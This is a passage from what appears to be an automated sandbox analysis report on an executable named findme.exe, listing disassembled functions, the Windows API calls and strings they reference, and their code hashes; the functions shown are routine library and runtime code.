                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                    • API String ID: 2141747552-1753850145
                    • Opcode ID: 9e5475aa8feac306673c1baf3381c8c3b11a4dfafe43a0e1347b721e543ee738
                    • Instruction ID: a953c6ee0edc09c1e34a8921527abb8f307af8fbaa6201ec1373a02291a092e1
                    • Opcode Fuzzy Hash: 9e5475aa8feac306673c1baf3381c8c3b11a4dfafe43a0e1347b721e543ee738
                    • Instruction Fuzzy Hash: 43E04FB4400741AECB319F359809F62BAE45B14706F10886FE5D6D3240EAF8D5408B68
                    Function 004E7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 81ea926bffb5ef3d0193cffbb3ab23ab410796c4eef8424d69cb41f627ee1391
                    • Instruction ID: 8ae72193aa2350ddb138cf1e0453bf5ca461ae1e8f723793665cc99d4decf7de
                    • Opcode Fuzzy Hash: 81ea926bffb5ef3d0193cffbb3ab23ab410796c4eef8424d69cb41f627ee1391
                    • Instruction Fuzzy Hash: 5C410432A00304AFDB24DF7AC880A6EB7A5EF85325F5545AEE515EB391DB34AD01CB84
                    Function 004EB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 004EB619
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004EB63C
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004EB662
                    • _free.LIBCMT ref: 004EB675
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EB684
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 88c8f0747863968dc60ff32d9e66c79c9b88a9addacf4fc054da0f9d7f5cc667
                    • Instruction ID: 02061007f8d0c5c4c0beed7e1b8e91ca6f470ff8d70b3a64f60b1960a58f6a43
                    • Opcode Fuzzy Hash: 88c8f0747863968dc60ff32d9e66c79c9b88a9addacf4fc054da0f9d7f5cc667
                    • Instruction Fuzzy Hash: 3D01B1726016A1BB27215A7B6C88D7B6A6DDFC6BA6315022EBC04D2210DF68CD01C1FA
                    Function 004D075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D0A41: ResetEvent.KERNEL32(?), ref: 004D0A53
                      • Part of subcall function 004D0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004D0A67
                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 004D078F
                    • CloseHandle.KERNEL32(?,?), ref: 004D07A9
                    • DeleteCriticalSection.KERNEL32(?), ref: 004D07C2
                    • CloseHandle.KERNEL32(?), ref: 004D07CE
                    • CloseHandle.KERNEL32(?), ref: 004D07DA
                      • Part of subcall function 004D084E: WaitForSingleObject.KERNEL32(?,000000FF,004D0A78,?), ref: 004D0854
                      • Part of subcall function 004D084E: GetLastError.KERNEL32(?), ref: 004D0860
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                    • String ID:
                    • API String ID: 1868215902-0
                    • Opcode ID: f1ef9756baa8010c1914e7c655af860d5bb723cec9d5de45dbd77b25869185da
                    • Instruction ID: e3650184421bec5430abcc64e5f87de3b0301351286d3f47687a632d3c9edc9e
                    • Opcode Fuzzy Hash: f1ef9756baa8010c1914e7c655af860d5bb723cec9d5de45dbd77b25869185da
                    • Instruction Fuzzy Hash: D4019E72440704EFC722AF69DD84F96BBE9FB49711F00052BF15E83264CB796A54CBA8
                    Function 004EBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004EBF28
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004EBF3A
                    • _free.LIBCMT ref: 004EBF4C
                    • _free.LIBCMT ref: 004EBF5E
                    • _free.LIBCMT ref: 004EBF70
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f68f1f819450e7c50d450a1ea019d63245e991b5b3fbe5fe7071e400c428768e
                    • Instruction ID: fadd73986260763ff77a32376a1a337102c7b8ff83f3228506c5657c8a878131
                    • Opcode Fuzzy Hash: f68f1f819450e7c50d450a1ea019d63245e991b5b3fbe5fe7071e400c428768e
                    • Instruction Fuzzy Hash: F4F0F432504691B78A20DB57ED85C1773D9FB04716754481EF408D7EA0DB28FC418A9C
                    Function 004E76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\findme.exe,00000104), ref: 004E76FD
                    • _free.LIBCMT ref: 004E77C8
                    • _free.LIBCMT ref: 004E77D2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Users\user\Desktop\findme.exe
                    • API String ID: 2506810119-2102845367
                    • Opcode ID: 1a7de3a3f6c14d17ff7a53ae9f54c55456fbc1e5b0727721471b77ddac8ca217
                    • Instruction ID: df3d5c9bc090f39a0c9aeb60e1ab54406794f800d567ad1c37d24abcdd997071
                    • Opcode Fuzzy Hash: 1a7de3a3f6c14d17ff7a53ae9f54c55456fbc1e5b0727721471b77ddac8ca217
                    • Instruction Fuzzy Hash: F931B371E04298AFDB21DF9BDC81D9FBBECEF95325B10406BE80497201D6746E41C759
                    Function 004C7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C7579
                      • Part of subcall function 004C3B3D: __EH_prolog.LIBCMT ref: 004C3B42
                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004C7640
                      • Part of subcall function 004C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004C7C04
                      • Part of subcall function 004C7BF5: GetLastError.KERNEL32 ref: 004C7C4A
                      • Part of subcall function 004C7BF5: CloseHandle.KERNEL32(?), ref: 004C7C59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                    • API String ID: 3813983858-639343689
                    • Opcode ID: 4517a45b06c5e0bab3429b1b10dddfb261766876a13b123244fdd461eb9c468b
                    • Instruction ID: aefa47a941692cb365e2b4c121f784e6f479f5e18f3354665bb3b0d5c7961445
                    • Opcode Fuzzy Hash: 4517a45b06c5e0bab3429b1b10dddfb261766876a13b123244fdd461eb9c468b
                    • Instruction Fuzzy Hash: 1231C175A04208AFDF60EB65DC41FFE7BA8AF15358F00405FF444A7292DB788A48CB69
                    Function 004DA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DA4B8
                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004DA4CD
                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 004DA4E2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: ASKNEXTVOL
                    • API String ID: 445417207-3402441367
                    • Opcode ID: 3b3c590c13da68ed800c29be7d817a5d3cb0434f8d039cd36a32c7c6095d7561
                    • Instruction ID: b8e10f78fa092270fd0b93eb39e17e418e7376bcafd61b2028f9712889653349
                    • Opcode Fuzzy Hash: 3b3c590c13da68ed800c29be7d817a5d3cb0434f8d039cd36a32c7c6095d7561
                    • Instruction Fuzzy Hash: D311B132241200BFD6319F689D1DF667769FF5B304F10001BF241A62B1C7A99D2AE72B
                    Function 004CD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: __fprintf_l_strncpy
                    • String ID: $%s$@%s
                    • API String ID: 1857242416-834177443
                    • Opcode ID: 5955add4e059fb82231d99c46a0dd77aeda245338e2ca6c28b248330914c6d60
                    • Instruction ID: 16f1ba43965865991a3bb6a685a6f7e176ae7bd811b63152283c269a74801268
                    • Opcode Fuzzy Hash: 5955add4e059fb82231d99c46a0dd77aeda245338e2ca6c28b248330914c6d60
                    • Instruction Fuzzy Hash: D721A17680030CAADB60DEA4CC06FEE7BA8EF04300F14056BFE15962A1D379DA55CB59
                    Function 004CB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    • _swprintf.LIBCMT ref: 004CB51E
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • _wcschr.LIBVCRUNTIME ref: 004CB53C
                    • _wcschr.LIBVCRUNTIME ref: 004CB54C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                    • String ID: %c:\
                    • API String ID: 525462905-3142399695
                    • Opcode ID: 5e8b2cad25bf20489ddad9c7fafeca366854b0cfa32be38bf3eefedd3f9fc5c2
                    • Instruction ID: 90085dcb976f9ff5410f4c84b26625528309ace1dfcbfb99173f03e339a02b1b
                    • Opcode Fuzzy Hash: 5e8b2cad25bf20489ddad9c7fafeca366854b0cfa32be38bf3eefedd3f9fc5c2
                    • Instruction Fuzzy Hash: 4D012667A04311BA8A206B669C83E2BA7ACDF953A5B50440FF844D6181EB38D840C2EA
                    Function 004D06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004CABC5,00000008,?,00000000,?,004CCB88,?,00000000), ref: 004D06F3
                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004CABC5,00000008,?,00000000,?,004CCB88,?,00000000), ref: 004D06FD
                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004CABC5,00000008,?,00000000,?,004CCB88,?,00000000), ref: 004D070D
                    Strings
                    • Thread pool initialization failed., xrefs: 004D0725
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                    • String ID: Thread pool initialization failed.
                    • API String ID: 3340455307-2182114853
                    • Opcode ID: 69666459ad8da1b4fd7e2c6ae52150ab9344537eb944f9eb62d156701eb5bed1
                    • Instruction ID: f5bbf28ac96a5ca2a4809a39bdc09e5ed1494a50da235bdfe6dac32ffc3dd59d
                    • Opcode Fuzzy Hash: 69666459ad8da1b4fd7e2c6ae52150ab9344537eb944f9eb62d156701eb5bed1
                    • Instruction Fuzzy Hash: 7E115EB1500709AFC3215F66D884AABFBECEB95755F10482FF2DA87300DA756980CB68
                    Function 004DD38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: RENAMEDLG$REPLACEFILEDLG
                    • API String ID: 0-56093855
                    • Opcode ID: aef791fac015be44292b5172a644a1b1d593de72a402d9d185e0f66e6b2f3a45
                    • Instruction ID: 2046ede449ac5a1f9c2796917fad776d5f1dfdb0911efbaddc2298fe1ddee447
                    • Opcode Fuzzy Hash: aef791fac015be44292b5172a644a1b1d593de72a402d9d185e0f66e6b2f3a45
                    • Instruction Fuzzy Hash: 3301B171A00259AFCB118F18EC44F6B3BA9F729394F004423F945D2370CA799C58FBA6
                    Function 004E91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                    • Instruction ID: 1f51b25c85aa2e5a4913f61bfb14e25708e34121f83b6753507b79a9b0cc1b51
                    • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                    • Instruction Fuzzy Hash: 87A145719043C69FDB21CE1AC8917AEBBA5EF15311F1845AFE9859B3C1C23C9C42C759
                    Function 004CA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,004C80B7,?,?,?), ref: 004CA351
                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,004C80B7,?,?), ref: 004CA395
                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,004C80B7,?,?,?,?,?,?,?,?), ref: 004CA416
                    • CloseHandle.KERNEL32(?,?,00000000,?,004C80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 004CA41D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$Create$CloseHandleTime
                    • String ID:
                    • API String ID: 2287278272-0
                    • Opcode ID: d8643dbd5c3dd1df457b913f2de9891fd6164ec9437cb557565b7845e845423f
                    • Instruction ID: 8ae64ee325bd4a9befb41e103ca2e69129e32f58fcc026ddffcb1e91c103121f
                    • Opcode Fuzzy Hash: d8643dbd5c3dd1df457b913f2de9891fd6164ec9437cb557565b7845e845423f
                    • Instruction Fuzzy Hash: 4A41FF34248388AED731DF64CC55FEFBBE4AB81308F04091EB9D0932D0C6689A58DB1B
                    Function 004EC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004E89AD,?,00000000,?,00000001,?,?,00000001,004E89AD,?), ref: 004EC0E6
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004EC16F
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004E67E2,?), ref: 004EC181
                    • __freea.LIBCMT ref: 004EC18A
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: 7bac479b1e29bf2e0f8eb0077a7695baf3fc38d193c4df3fb1f6527673cce95a
                    • Instruction ID: ce58e33cf75296236fb22a0c817943d3658a51d76fabd6cf225ba7105d8402a5
                    • Opcode Fuzzy Hash: 7bac479b1e29bf2e0f8eb0077a7695baf3fc38d193c4df3fb1f6527673cce95a
                    • Instruction Fuzzy Hash: 86310372A0014AABDF249F66CC85DAFBBA5EF00311F05016AFC04D7251E739DD62CBA4
                    Function 004D9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 004D9DBE
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D9DCD
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D9DDB
                    • ReleaseDC.USER32(00000000,00000000), ref: 004D9DE9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
